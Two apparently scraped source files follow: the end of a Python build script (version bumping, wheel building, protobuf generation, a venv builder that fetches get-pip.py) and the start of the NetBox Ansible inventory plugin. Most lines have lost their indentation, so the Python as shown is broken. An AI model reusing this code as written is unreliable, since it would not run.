reset_version = "0.0.0"
filename = os.path.join(FLAGS.base_dir, "VERSION")
with open(filename, "w") as vfile:
vfile.writelines(f"{reset_version}")
lines = []
filename = os.path.join(FLAGS.cwd, ".bumpversion.cfg")
with open(filename, "r") as vfile:
lines = vfile.readlines()
for i, line in enumerate(lines):
if line.startswith("current_version = "):
lines[i] = f"current_version = {reset_version}\n"
with open(filename, "w") as vfile:
vfile.writelines(lines)
get_version()
log("version: {}".format(FLAGS.version))
def bump_to_version(minor: bool = False, major: bool = False, reset: bool = False):
runarguments = ["bump2version", "--allow-dirty"]
if reset:
reset_version()
runarguments += ["patch"]
elif major:
runarguments += ["major"]
elif minor:
runarguments += ["minor"]
else:
runarguments += ["patch"]
# runarguments = ['which', 'bump2version']
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
p.wait()
fail_if(p.returncode != 0, "bump_to_version failed")
get_version()
except Exception as e:
logging.error(e)
logging.error(traceback.format_exc())
fail("bump_to_version failed")
def remove_file_or_dir(inp_path, recursive=False):
"""param <path> could either be relative or absolute."""
path = str(pathlib.Path(inp_path).absolute())
if os.path.isfile(path) or os.path.islink(path):
os.remove(path) # remove the file
elif os.path.isdir(path):
        shutil.rmtree(path)  # remove the dir and everything it contains
else:
glob_list = glob.glob(path, recursive=recursive)
if len(glob_list) > 0:
for name in glob_list:
log_verbose(name)
if os.path.isfile(name) or os.path.islink(name):
os.remove(name) # remove the file
elif os.path.isdir(name):
                    shutil.rmtree(name)  # remove the dir and everything it contains
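# Illustrative usage sketch (not part of the original script): remove_file_or_dir()
# accepts a concrete file, a directory, or - as a fallback - a glob pattern. The
# paths below are hypothetical.
def _example_remove_usage():
    remove_file_or_dir("build/artifact.log")              # a single file or symlink
    remove_file_or_dir("build/tmp")                       # a whole directory tree
    remove_file_or_dir("src/**/*.pyc", recursive=True)    # glob pattern fallback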
def remove_cythonize():
remove_file_or_dir(FLAGS.dist_dir)
def remove_session_dir():
remove_file_or_dir(FLAGS.session_dir)
def remove_persistent_dir():
remove_file_or_dir(FLAGS.persistent_dir)
def clean_cythonize():
remove_file_or_dir("build")
remove_file_or_dir(f"{FLAGS.base_dir}.egg-info")
remove_file_or_dir(f"{FLAGS.base_dir}/**/*.c", recursive=True)
remove_file_or_dir(f"{FLAGS.base_dir}/**/*.o", recursive=True)
if target_platform() == "windows":
remove_file_or_dir(f"{FLAGS.base_dir}/**/*.pyd", recursive=True)
# remove_file_or_dir(f'{FLAGS.base_dir}/**/*.so', recursive=True)
# rm -rf *.egg-info
# find . -name "*.c" -type f -delete
# find . -name "*.o" -type f -delete
# find . -name "*.so" -type f -delete
def zip_dir(dir_name, filename):
"""zipper"""
with zipfile.ZipFile(filename, "w", compression=zipfile.ZIP_DEFLATED, allowZip64=True) as zip:
for root, _, files in os.walk(dir_name):
for f in files:
rel_path = os.path.join(os.path.relpath(root, dir_name), f)
abs_path = os.path.join(root, f)
zip.write(abs_path, rel_path)
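# Illustrative usage sketch (not part of the original script): zip_dir() archives a
# directory, storing entries relative to dir_name as in the walk above. The paths
# below are hypothetical.
def _example_zip_usage():
    mkdir("example_out")
    zip_dir("example_out", "example_out.zip")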
def wheel_remove_source_files():
for filename in glob.glob(os.path.join(FLAGS.dist_dir, "*.whl")):
name = os.path.splitext(os.path.basename(filename))[0]
try:
dir_name = os.path.join(FLAGS.dist_dir, name)
os.mkdir(dir_name)
log_verbose(f"Extracting files in {dir_name}")
with zipfile.ZipFile(filename) as zip:
zip.extractall(path=dir_name)
file_list = glob.glob(os.path.join(dir_name, "**/*.py"), recursive=True)
file_list.extend(glob.glob(os.path.join(dir_name, "**/*.c"), recursive=True))
for filename1 in file_list:
if not filename1.endswith("__init__.py"):
if os.path.isfile(filename1) or os.path.islink(filename1):
os.remove(filename1) # remove the file
zip_dir(dir_name, filename)
shutil.rmtree(dir_name)
except zipfile.BadZipfile:
print("BAD ZIP: " + filename)
log(filename)
def do_cythonize():
clean_cythonize()
remove_cythonize()
# runarguments = [sys.executable, 'setup.py', 'bdist_wheel', '--exclude_source_files']
runarguments = [sys.executable, "setup.py", "bdist_wheel", "-d", FLAGS.dist_dir]
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
p.wait()
wheel_remove_source_files()
clean_cythonize()
fail_if(p.returncode != 0, "do_cythonize failed")
except Exception:
logging.error(traceback.format_exc())
fail("do_cythonize failed")
def do_mypy_test():
runarguments = [sys.executable, "-m", "mypy", FLAGS.base_dir]
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
p.wait()
fail_if(p.returncode != 0, "do_mypy_test failed")
except Exception:
logging.error(traceback.format_exc())
fail("do_mypy_test failed")
def do_sort_import():
runarguments = [sys.executable, "-m", "isort", FLAGS.base_dir]
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
p.wait()
fail_if(p.returncode != 0, "do_sort_import failed")
except Exception:
logging.error(traceback.format_exc())
fail("do_sort_import failed")
def do_format_black():
runarguments = [sys.executable, "-m", "black", FLAGS.base_dir]
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
p.wait()
fail_if(p.returncode != 0, "do_format_black failed")
except Exception:
logging.error(traceback.format_exc())
fail("do_format_black failed")
def do_format_yapf():
runarguments = [
sys.executable,
"-m",
"yapf",
"--in-place",
"--recursive",
FLAGS.base_dir,
]
log("Yapf formatting started")
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
p.wait()
fail_if(p.returncode != 0, "do_format_yapf failed")
except Exception:
logging.error(traceback.format_exc())
fail("do_format_yapf failed")
log("Yapf formatting completed")
def generate_proto_code():
proto_interface_dir = f"{FLAGS.module_name}/data_models/interfaces"
out_folder = f"{FLAGS.module_name}/data_models"
proto_it = pathlib.Path().glob(proto_interface_dir + "/**/*")
protos = [str(proto) for proto in proto_it if proto.is_file()]
protoc_exe = "protoc"
if target_platform() == "windows":
protoc_exe = "protoc/bin/protoc.exe"
l = [protoc_exe] + protos + ["--python_betterproto_out", out_folder, "--proto_path", proto_interface_dir]
str1 = ' '.join(l)
log(f"Executing command: {str1}")
subprocess.check_call(l)
def generate_proto_cpp_code():
proto_interface_dir = f"{FLAGS.module_name}/data_models/interfaces"
out_folder = f"{FLAGS.module_name}/data_models_cpp"
proto_it = pathlib.Path().glob(proto_interface_dir + "/**/*")
protos = [str(proto) for proto in proto_it if proto.is_file()]
protoc_exe = "protoc"
if target_platform() == "windows":
protoc_exe = "protoc/bin/protoc.exe"
l = [protoc_exe] + protos + ["--cpp_out", out_folder, "--proto_path", proto_interface_dir]
str1 = ' '.join(l)
log(f"Executing command: {str1}")
subprocess.check_call(l)
class ExtendedEnvBuilder(venv.EnvBuilder):
"""
This builder installs setuptools and pip so that you can pip or
easy_install other packages into the created virtual environment.
:param nodist: If true, setuptools and pip are not installed into the
created virtual environment.
:param nopip: If true, pip is not installed into the created
virtual environment.
:param progress: If setuptools or pip are installed, the progress of the
installation can be monitored by passing a progress
callable. If specified, it is called with two
arguments: a string indicating some progress, and a
context indicating where the string is coming from.
The context argument can have one of three values:
'main', indicating that it is called from virtualize()
itself, and 'stdout' and 'stderr', which are obtained
by reading lines from the output streams of a subprocess
which is used to install the app.
If a callable is not specified, default progress
information is output to sys.stderr.
"""
def __init__(self, *args, **kwargs):
self.nodist = kwargs.pop("nodist", False)
self.nopip = kwargs.pop("nopip", False)
self.progress = kwargs.pop("progress", None)
self.verbose = kwargs.pop("verbose", False)
super().__init__(*args, **kwargs)
def post_setup(self, context):
"""
Set up any packages which need to be pre-installed into the
virtual environment being created.
:param context: The information for the virtual environment
creation request being processed.
"""
os.environ["VIRTUAL_ENV"] = context.env_dir
# if not self.nodist:
# self.install_setuptools(context)
# Can't install pip without setuptools
if not self.nopip and not self.nodist:
self.install_pip(context)
def reader(self, stream, context):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
progress = self.progress
while True:
s = stream.readline()
if not s:
break
if progress is not None:
progress(s, context)
else:
if not self.verbose:
sys.stderr.write(".")
else:
sys.stderr.write(s.decode("utf-8"))
sys.stderr.flush()
stream.close()
def install_script(self, context, name, url):
_, _, path, _, _, _ = urlparse(url)
fn = os.path.split(path)[-1]
binpath = context.bin_path
distpath = os.path.join(binpath, fn)
# Download script into the virtual environment's binaries folder
urlretrieve(url, distpath)
progress = self.progress
if self.verbose:
term = "\n"
else:
term = ""
if progress is not None:
progress("Installing %s ...%s" % (name, term), "main")
else:
sys.stderr.write("Installing %s ...%s" % (name, term))
sys.stderr.flush()
# Install in the virtual environment
args = [context.env_exe, fn]
p = Popen(args, stdout=PIPE, stderr=PIPE, cwd=binpath)
t1 = Thread(target=self.reader, args=(p.stdout, "stdout"))
t1.start()
t2 = Thread(target=self.reader, args=(p.stderr, "stderr"))
t2.start()
p.wait()
t1.join()
t2.join()
if progress is not None:
progress("done.", "main")
else:
sys.stderr.write("done.\n")
# Clean up - no longer needed
os.unlink(distpath)
def install_setuptools(self, context):
"""
Install setuptools in the virtual environment.
:param context: The information for the virtual environment
creation request being processed.
"""
url = "https://bitbucket.org/pypa/setuptools/downloads/ez_setup.py"
self.install_script(context, "setuptools", url)
# clear up the setuptools archive which gets downloaded
pred = lambda o: o.startswith("setuptools-") and o.endswith(".tar.gz")
files = filter(pred, os.listdir(context.bin_path))
for f in files:
f = os.path.join(context.bin_path, f)
os.unlink(f)
def install_pip(self, context):
"""
Install pip in the virtual environment.
:param context: The information for the virtual environment
creation request being processed.
"""
url = "https://bootstrap.pypa.io/get-pip.py"
self.install_script(context, "pip", url)
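# Illustrative usage sketch (not part of the original script): creating a virtual
# environment with ExtendedEnvBuilder, mirroring create_virtual_env() below. The
# target path is hypothetical; nodist/nopip skip the bootstrap downloads.
def _example_create_env(path="./example-venv"):
    builder = ExtendedEnvBuilder(nodist=True, nopip=True)
    builder.create(path)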
def remove_virtual_env():
remove_file_or_dir(FLAGS.virtual_env_path, True)
def create_virtual_env():
builder = ExtendedEnvBuilder()
builder.create(FLAGS.virtual_env_path)
with open(os.path.join(FLAGS.virtual_env_path, ".gitignore"), "w") as f:
f.writelines(["*"])
log(f"Create virtual environment {FLAGS.virtual_env_path}")
def get_module_name() -> str:
glob_list = glob.glob(os.path.join(FLAGS.dist_dir, f"{FLAGS.module_name}*.whl"))
for name in glob_list:
log_verbose(name)
return name
return f"{FLAGS.module_name}.whl"
def install_requirements_in_virtual_env():
if target_platform() == "windows":
pip_in_virtual_env = os.path.join(FLAGS.virtual_env_path, "Scripts", "python.exe")
else:
pip_in_virtual_env = os.path.join(FLAGS.virtual_env_path, "bin", "python")
runarguments = [pip_in_virtual_env, "-m", "pip", "install", "-r", os.path.join(FLAGS.cwd, "requirements.txt")]
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
logging.info("Running pip")
p.wait()
fail_if(p.returncode != 0, f"pip failed {p.returncode}")
except Exception:
logging.error(traceback.format_exc())
fail("pip failed")
def install_module_in_virtual_env():
if target_platform() == "windows":
pip_in_virtual_env = os.path.join(FLAGS.virtual_env_path, "Scripts", "python.exe")
else:
pip_in_virtual_env = os.path.join(FLAGS.virtual_env_path, "bin", "python")
runarguments = [pip_in_virtual_env, "-m", "pip", "install", "--upgrade", "--no-deps", "--force-reinstall", get_module_name()]
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
logging.info("Running pip")
p.wait()
fail_if(p.returncode != 0, f"pip failed {p.returncode}")
except Exception:
logging.error(traceback.format_exc())
fail("pip failed")
def run_module_in_virtual_env():
if target_platform() == "windows":
module_in_virtual_env = os.path.join(FLAGS.virtual_env_path, "Scripts", f"{FLAGS.module_name}.exe")
else:
module_in_virtual_env = os.path.join(FLAGS.virtual_env_path, "bin", f"{FLAGS.module_name}")
runarguments = [module_in_virtual_env]
try:
p = subprocess.Popen(runarguments, cwd=FLAGS.cwd)
logging.info("Running module")
time.sleep(10)
logging.info("Sending stop signal")
p.send_signal(signal.SIGTERM)
p.wait()
fail_if(p.returncode != 0, f"run_module failed {p.returncode}")
except Exception:
logging.error(traceback.format_exc())
fail("run_module failed")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
group_qv = parser.add_mutually_exclusive_group()
group_qv.add_argument(
"-q",
"--quiet",
action="store_true",
required=False,
help="Disable console output.",
)
group_qv.add_argument(
"-v",
"--verbose",
action="store_true",
required=False,
help="Enable verbose output.",
)
parser.add_argument("--enable-logging", action="store_true", required=False, help="Enable logging.")
parser.add_argument(
"--enable-stats",
action="store_true",
required=False,
help="Enable statistics collection.",
)
F = parser.parse_args()
    # argparse's store_true flags are never None, so these checks reduce to
    # straightforward flag copies; behaviour is unchanged.
    if not F.quiet:
        FLAGS.quiet = False
    if F.verbose:
        FLAGS.verbose = True
# FLAGS = parser.parse_args()
# FLAGS.module_name = "vrpc"
FLAGS.cwd = get_cwd()
FLAGS.virtual_env_path = os.path.join(FLAGS.cwd, "xx")
FLAGS.dist_dir = os.path.join(get_cwd(), "dist")
FLAGS.base_dir = os.path.join(get_cwd(), FLAGS.module_name)
FLAGS.session_dir = os.path.join(get_cwd(), "session")
FLAGS.persistent_dir = os.path.join(get_cwd(), "persistent")
print(sys.executable)
# Determine the versions from VERSION file.
# get_version()
# # reset_version()
# bump_to_version()
# remove_session_dir()
# remove_persistent_dir()
generate_proto_code()
# generate_proto_cpp_code()
# do_sort_import()
# do_format_black()
# do_format_yapf()
# do_mypy_test()
# do_cythonize()
# remove_virtual_env()
# create_virtual_env()
# install_requirements_in_virtual_env()
# install_module_in_virtual_env()
# run_module_in_virtual_env()
|
nb_inventory.py
|
# Copyright (c) 2018 Remy Leone
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
name: nb_inventory
plugin_type: inventory
author:
- Remy Leone (@sieben)
- Anthony Ruhier (@Anthony25)
- Nikhil Singh Baliyan (@nikkytub)
- Sander Steffann (@steffann)
- Douglas Heriot (@DouglasHeriot)
short_description: NetBox inventory source
description:
- Get inventory hosts from NetBox
extends_documentation_fragment:
- constructed
- inventory_cache
options:
plugin:
description: token that ensures this is a source file for the 'netbox' plugin.
required: True
choices: ['netbox.netbox.nb_inventory']
api_endpoint:
description: Endpoint of the NetBox API
required: True
env:
- name: NETBOX_API
validate_certs:
description:
- Allows connection when SSL certificates are not valid. Set to C(false) when certificates are not trusted.
default: True
type: boolean
cert:
description:
- Certificate path
default: False
key:
description:
- Certificate key path
default: False
ca_path:
description:
- CA path
default: False
follow_redirects:
description:
            - Determine how redirects are followed.
            - By default, I(follow_redirects) is set to C(urllib2), which uses urllib2's default behavior.
default: urllib2
choices: ['urllib2', 'all', 'yes', 'safe', 'none']
config_context:
description:
- If True, it adds config_context in host vars.
- Config-context enables the association of arbitrary data to devices and virtual machines grouped by
region, site, role, platform, and/or tenant. Please check official netbox docs for more info.
default: False
type: boolean
flatten_config_context:
description:
- If I(config_context) is enabled, by default it's added as a host var named config_context.
- If flatten_config_context is set to True, the config context variables will be added directly to the host instead.
default: False
type: boolean
version_added: "0.2.1"
flatten_local_context_data:
description:
- If I(local_context_data) is enabled, by default it's added as a host var named local_context_data.
- If flatten_local_context_data is set to True, the config context variables will be added directly to the host instead.
default: False
type: boolean
version_added: "0.3.0"
flatten_custom_fields:
description:
- By default, host custom fields are added as a dictionary host var named custom_fields.
- If flatten_custom_fields is set to True, the fields will be added directly to the host instead.
default: False
type: boolean
version_added: "0.2.1"
token:
required: False
description:
- NetBox API token to be able to read against NetBox.
- This may not be required depending on the NetBox setup.
env:
# in order of precedence
- name: NETBOX_TOKEN
- name: NETBOX_API_KEY
plurals:
description:
- If True, all host vars are contained inside single-element arrays for legacy compatibility with old versions of this plugin.
- Group names will be plural (ie. "sites_mysite" instead of "site_mysite")
- The choices of I(group_by) will be changed by this option.
default: True
type: boolean
version_added: "0.2.1"
interfaces:
description:
- If True, it adds the device or virtual machine interface information in host vars.
default: False
type: boolean
version_added: "0.1.7"
site_data:
description:
- If True, sites' full data structures returned from Netbox API are included in host vars.
default: False
type: boolean
version_added: "3.5.0"
prefixes:
description:
- If True, it adds the device or virtual machine prefixes to hostvars nested under "site".
- Must match selection for "site_data", as this changes the structure of "site" in hostvars
default: False
type: boolean
version_added: "3.5.0"
services:
description:
- If True, it adds the device or virtual machine services information in host vars.
default: True
type: boolean
version_added: "0.2.0"
fetch_all:
description:
- By default, fetching interfaces and services will get all of the contents of NetBox regardless of query_filters applied to devices and VMs.
- When set to False, separate requests will be made fetching interfaces, services, and IP addresses for each device_id and virtual_machine_id.
- If you are using the various query_filters options to reduce the number of devices, you may find querying NetBox faster with fetch_all set to False.
- For efficiency, when False, these requests will be batched, for example /api/dcim/interfaces?limit=0&device_id=1&device_id=2&device_id=3
- These GET request URIs can become quite large for a large number of devices. If you run into HTTP 414 errors, you can adjust the max_uri_length option to suit your web server.
default: True
type: boolean
version_added: "0.2.1"
group_by:
description:
- Keys used to create groups. The I(plurals) and I(racks) options control which of these are valid.
- I(rack_group) is supported on NetBox versions 2.10 or lower only
- I(location) is supported on NetBox versions 2.11 or higher only
type: list
choices:
- sites
- site
- location
- tenants
- tenant
- racks
- rack
- rack_group
- rack_role
- tags
- tag
- device_roles
- role
- device_types
- device_type
- manufacturers
- manufacturer
- platforms
- platform
- region
- site_group
- cluster
- cluster_type
- cluster_group
- is_virtual
- services
- status
default: []
group_names_raw:
description: Will not add the group_by choice name to the group names
default: False
type: boolean
version_added: "0.2.0"
query_filters:
description: List of parameters passed to the query string for both devices and VMs (Multiple values may be separated by commas)
type: list
default: []
device_query_filters:
description: List of parameters passed to the query string for devices (Multiple values may be separated by commas)
type: list
default: []
vm_query_filters:
description: List of parameters passed to the query string for VMs (Multiple values may be separated by commas)
type: list
default: []
timeout:
description: Timeout for NetBox requests in seconds
type: int
default: 60
max_uri_length:
description:
- When fetch_all is False, GET requests to NetBox may become quite long and return a HTTP 414 (URI Too Long).
- You can adjust this option to be smaller to avoid 414 errors, or larger for a reduced number of requests.
type: int
default: 4000
version_added: "0.2.1"
virtual_chassis_name:
description:
- When a device is part of a virtual chassis, use the virtual chassis name as the Ansible inventory hostname.
- The host var values will be from the virtual chassis master.
type: boolean
default: False
dns_name:
description:
- Force IP Addresses to be fetched so that the dns_name for the primary_ip of each device or VM is set as a host_var.
- Setting interfaces will also fetch IP addresses and the dns_name host_var will be set.
type: boolean
default: False
ansible_host_dns_name:
description:
- If True, sets DNS Name (fetched from primary_ip) to be used in ansible_host variable, instead of IP Address.
type: boolean
default: False
compose:
description: List of custom ansible host vars to create from the device object fetched from NetBox
default: {}
type: dict
racks:
description:
- If False, skip querying the racks for information, which can be slow with great amounts of racks.
- The choices of I(group_by) will be changed by this option.
type: boolean
default: True
version_added: "3.6.0"
"""
EXAMPLES = """
# netbox_inventory.yml file in YAML format
# Example command line: ansible-inventory -v --list -i netbox_inventory.yml
plugin: netbox.netbox.nb_inventory
api_endpoint: http://localhost:8000
validate_certs: True
config_context: False
group_by:
- device_roles
query_filters:
- role: network-edge-router
device_query_filters:
- has_primary_ip: 'true'
# has_primary_ip is a useful way to filter out patch panels and other passive devices
# Query filters are passed directly as an argument to the fetching queries.
# You can repeat tags in the query string.
query_filters:
- role: server
- tag: web
- tag: production
# See the NetBox documentation at https://netbox.readthedocs.io/en/stable/rest-api/overview/
# the query_filters work as a logical **OR**
#
# Prefix any custom fields with cf_ and pass the field value with the regular NetBox query string
query_filters:
- cf_foo: bar
# NetBox inventory plugin also supports Constructable semantics
# You can fill your hosts vars using the compose option:
plugin: netbox.netbox.nb_inventory
compose:
foo: last_updated
bar: display_name
nested_variable: rack.display_name
# You can use keyed_groups to group on properties of devices or VMs.
# NOTE: It's only possible to key off direct items on the device/VM objects.
plugin: netbox.netbox.nb_inventory
keyed_groups:
- prefix: status
key: status.value
# For use in Ansible Tower (AWX), please see this blog from RedHat: https://www.ansible.com/blog/using-an-inventory-plugin-from-a-collection-in-ansible-tower
# The credential for NetBox will need to expose NETBOX_API and NETBOX_TOKEN as environment variables.
# Example Ansible Tower credential Input Configuration:
fields:
- id: NETBOX_API
type: string
label: NetBox Host URL
- id: NETBOX_TOKEN
type: string
label: NetBox API Token
secret: true
required:
- NETBOX_API
- NETBOX_TOKEN
# Example Ansible Tower credential Injector Configuration:
env:
NETBOX_API: '{{ NETBOX_API }}'
NETBOX_TOKEN: '{{ NETBOX_TOKEN }}'
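# Illustrative example (not part of the upstream docs): when query_filters select only
# a few devices, disabling fetch_all switches to batched per-id requests for
# interfaces, services and IP addresses; max_uri_length bounds those batched GET URIs
# (see the fetch_all and max_uri_length option documentation above).
plugin: netbox.netbox.nb_inventory
api_endpoint: http://localhost:8000
fetch_all: False
max_uri_length: 4000
query_filters:
  - role: network-edge-router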
"""
import json
import uuid
import math
import os
from copy import deepcopy
from functools import partial
from sys import version as python_version
from threading import Thread
from typing import Iterable
from itertools import chain
from collections import defaultdict
from ipaddress import ip_interface
from packaging import specifiers, version
from ansible.constants import DEFAULT_LOCAL_TMP
from ansible.plugins.inventory import BaseInventoryPlugin, Constructable, Cacheable
from ansible.module_utils.ansible_release import __version__ as ansible_version
from ansible.errors import AnsibleError
from ansible.module_utils._text import to_text, to_native
from ansible.module_utils.urls import open_url
from ansible.module_utils.six.moves.urllib import error as urllib_error
from ansible.module_utils.six.moves.urllib.parse import urlencode
class InventoryModule(BaseInventoryPlugin, Constructable, Cacheable):
NAME = "netbox.netbox.nb_inventory"
def _fetch_information(self, url):
results = None
cache_key = self.get_cache_key(url)
# get the user's cache option to see if we should save the cache if it is changing
user_cache_setting = self.get_option("cache")
# read if the user has caching enabled and the cache isn't being refreshed
attempt_to_read_cache = user_cache_setting and self.use_cache
# attempt to read the cache if inventory isn't being refreshed and the user has caching enabled
if attempt_to_read_cache:
try:
results = self._cache[cache_key]
need_to_fetch = False
except KeyError:
# occurs if the cache_key is not in the cache or if the cache_key expired
# we need to fetch the URL now
need_to_fetch = True
else:
# not reading from cache so do fetch
need_to_fetch = True
if need_to_fetch:
self.display.v("Fetching: " + url)
try:
response = open_url(
url,
headers=self.headers,
timeout=self.timeout,
validate_certs=self.validate_certs,
follow_redirects=self.follow_redirects,
client_cert=self.cert,
client_key=self.key,
ca_path=self.ca_path,
)
except urllib_error.HTTPError as e:
"""This will return the response body when we encounter an error.
This is to help determine what might be the issue when encountering an error.
Please check issue #294 for more info.
"""
# Prevent inventory from failing completely if the token does not have the proper permissions for specific URLs
if e.code == 403:
self.display.display(
"Permission denied: {0}. This may impair functionality of the inventory plugin.".format(
url
),
color="red",
)
# Need to return mock response data that is empty to prevent any failures downstream
return {"results": [], "next": None}
raise AnsibleError(to_native(e.fp.read()))
try:
raw_data = to_text(response.read(), errors="surrogate_or_strict")
except UnicodeError:
raise AnsibleError(
"Incorrect encoding of fetched payload from NetBox API."
)
try:
results = json.loads(raw_data)
except ValueError:
raise AnsibleError("Incorrect JSON payload: %s" % raw_data)
# put result in cache if enabled
if user_cache_setting:
self._cache[cache_key] = results
return results
def get_resource_list(self, api_url):
"""Retrieves resource list from netbox API.
Returns:
A list of all resource from netbox API.
"""
if not api_url:
raise AnsibleError("Please check API URL in script configuration file.")
resources = []
# Handle pagination
while api_url:
api_output = self._fetch_information(api_url)
resources.extend(api_output["results"])
api_url = api_output["next"]
return resources
def get_resource_list_chunked(self, api_url, query_key, query_values):
# Make an API call for multiple specific IDs, like /api/ipam/ip-addresses?limit=0&device_id=1&device_id=2&device_id=3
        # Drastically cuts down HTTP requests compared to 1 request per host, for the case where fetch_all is disabled
# Make sure query_values is subscriptable
if not isinstance(query_values, list):
query_values = list(query_values)
def query_string(value, separator="&"):
return separator + query_key + "=" + str(value)
# Calculate how many queries we can do per API call to stay within max_url_length
largest_value = str(max(query_values, default=0)) # values are always id ints
length_per_value = len(query_string(largest_value))
chunk_size = math.floor((self.max_uri_length - len(api_url)) / length_per_value)
# Sanity check, for case where max_uri_length < (api_url + length_per_value)
if chunk_size < 1:
chunk_size = 1
if self.api_version in specifiers.SpecifierSet("~=2.6.0"):
# Issue netbox-community/netbox#3507 was fixed in v2.7.5
# If using NetBox v2.7.0-v2.7.4 will have to manually set max_uri_length to 0,
# but it's probably faster to keep fetch_all: True
# (You should really just upgrade your NetBox install)
chunk_size = 1
resources = []
for i in range(0, len(query_values), chunk_size):
chunk = query_values[i : i + chunk_size]
# process chunk of size <= chunk_size
url = api_url
for value in chunk:
url += query_string(value, "&" if "?" in url else "?")
resources.extend(self.get_resource_list(url))
return resources
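    # Illustrative sketch (not part of the original plugin): the chunk-size math used
    # in get_resource_list_chunked() above, on concrete (hypothetical) numbers. With
    # max_uri_length=100, an api_url of length 40 and ids up to four digits
    # ("&device_id=9999" is 15 characters), floor((100 - 40) / 15) = 4 ids per request.
    @staticmethod
    def _example_chunk_size(max_uri_length=100, api_url_len=40, per_value_len=15):
        return max(1, math.floor((max_uri_length - api_url_len) / per_value_len))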
@property
def group_extractors(self):
# List of group_by options and hostvars to extract
# Some keys are different depending on plurals option
extractors = {
"disk": self.extract_disk,
"memory": self.extract_memory,
"vcpus": self.extract_vcpus,
"status": self.extract_status,
"config_context": self.extract_config_context,
"local_context_data": self.extract_local_context_data,
"custom_fields": self.extract_custom_fields,
"region": self.extract_regions,
"cluster": self.extract_cluster,
"cluster_group": self.extract_cluster_group,
"cluster_type": self.extract_cluster_type,
"is_virtual": self.extract_is_virtual,
self._pluralize_group_by("site"): self.extract_site,
self._pluralize_group_by("tenant"): self.extract_tenant,
self._pluralize_group_by("tag"): self.extract_tags,
self._pluralize_group_by("role"): self.extract_device_role,
self._pluralize_group_by("platform"): self.extract_platform,
self._pluralize_group_by("device_type"): self.extract_device_type,
self._pluralize_group_by("manufacturer"): self.extract_manufacturer,
}
if self.api_version >= version.parse("2.11"):
extractors.update(
{
"site_group": self.extract_site_groups,
}
)
if self.racks:
extractors.update(
{
self._pluralize_group_by("rack"): self.extract_rack,
"rack_role": self.extract_rack_role,
}
)
# Locations were added in 2.11 replacing rack-groups.
if self.api_version >= version.parse("2.11"):
extractors.update(
{
"location": self.extract_location,
}
)
else:
extractors.update(
{
"rack_group": self.extract_rack_group,
}
)
if self.services:
extractors.update(
{
"services": self.extract_services,
}
)
if self.interfaces:
extractors.update(
{
"interfaces": self.extract_interfaces,
}
)
if self.interfaces or self.dns_name or self.ansible_host_dns_name:
extractors.update(
{
"dns_name": self.extract_dns_name,
}
)
return extractors
def _pluralize_group_by(self, group_by):
mapping = {
"site": "sites",
"tenant": "tenants",
"rack": "racks",
"tag": "tags",
"role": "device_roles",
"platform": "platforms",
"device_type": "device_types",
"manufacturer": "manufacturers",
}
if self.plurals:
mapped = mapping.get(group_by)
return mapped or group_by
else:
return group_by
def _pluralize(self, extracted_value):
# If plurals is enabled, wrap in a single-element list for backwards compatibility
if self.plurals:
return [extracted_value]
else:
return extracted_value
def _objects_array_following_parents(
self, initial_object_id, object_lookup, object_parent_lookup
):
objects = []
object_id = initial_object_id
# Keep looping until the object has no parent
while object_id is not None:
object_slug = object_lookup[object_id]
if object_slug in objects:
# Won't ever happen - defensively guard against infinite loop
break
objects.append(object_slug)
# Get the parent of this object
object_id = object_parent_lookup[object_id]
return objects
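    # Illustrative sketch (not part of the original plugin): how
    # _objects_array_following_parents() walks a parent chain. With the hypothetical
    # lookups below, starting from id 3 yields ["leaf", "middle", "root"].
    def _example_parent_chain(self):
        object_lookup = {1: "root", 2: "middle", 3: "leaf"}
        object_parent_lookup = {1: None, 2: 1, 3: 2}
        return self._objects_array_following_parents(
            initial_object_id=3,
            object_lookup=object_lookup,
            object_parent_lookup=object_parent_lookup,
        )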
def extract_disk(self, host):
return host.get("disk")
def extract_vcpus(self, host):
return host.get("vcpus")
def extract_status(self, host):
return host["status"]
def extract_memory(self, host):
return host.get("memory")
def extract_platform(self, host):
try:
return self._pluralize(self.platforms_lookup[host["platform"]["id"]])
except Exception:
return
def extract_services(self, host):
try:
services_lookup = (
self.vm_services_lookup
if host["is_virtual"]
else self.device_services_lookup
)
return list(services_lookup[host["id"]].values())
except Exception:
return
def extract_device_type(self, host):
try:
return self._pluralize(self.device_types_lookup[host["device_type"]["id"]])
except Exception:
return
def extract_rack(self, host):
try:
return self._pluralize(self.racks_lookup[host["rack"]["id"]])
except Exception:
return
def extract_rack_group(self, host):
# A host may have a rack. A rack may have a rack_group. A rack_group may have a parent rack_group.
# Produce a list of rack_groups:
# - it will be empty if the device has no rack, or the rack has no rack_group
# - it will have 1 element if the rack's group has no parent
# - it will have multiple elements if the rack's group has a parent group
rack = host.get("rack", None)
if not isinstance(rack, dict):
# Device has no rack
return None
rack_id = rack.get("id", None)
if rack_id is None:
# Device has no rack
return None
return self._objects_array_following_parents(
initial_object_id=self.racks_group_lookup[rack_id],
object_lookup=self.rack_groups_lookup,
object_parent_lookup=self.rack_group_parent_lookup,
)
def extract_rack_role(self, host):
try:
return self.racks_role_lookup[host["rack"]["id"]]
except Exception:
return
def extract_site(self, host):
try:
site = self.sites_lookup[host["site"]["id"]]
if (
self.prefixes
): # If prefixes have been pulled, attach prefix list to its assigned site
prefixes = self.prefixes_sites_lookup[site["id"]]
site["prefixes"] = prefixes
return self._pluralize(site)
except Exception:
return
def extract_tenant(self, host):
try:
return self._pluralize(self.tenants_lookup[host["tenant"]["id"]])
except Exception:
return
def extract_device_role(self, host):
try:
if "device_role" in host:
return self._pluralize(
self.device_roles_lookup[host["device_role"]["id"]]
)
elif "role" in host:
return self._pluralize(self.device_roles_lookup[host["role"]["id"]])
except Exception:
return
def extract_config_context(self, host):
try:
if self.flatten_config_context:
# Don't wrap in an array if we're about to flatten it to separate host vars
return host["config_context"]
else:
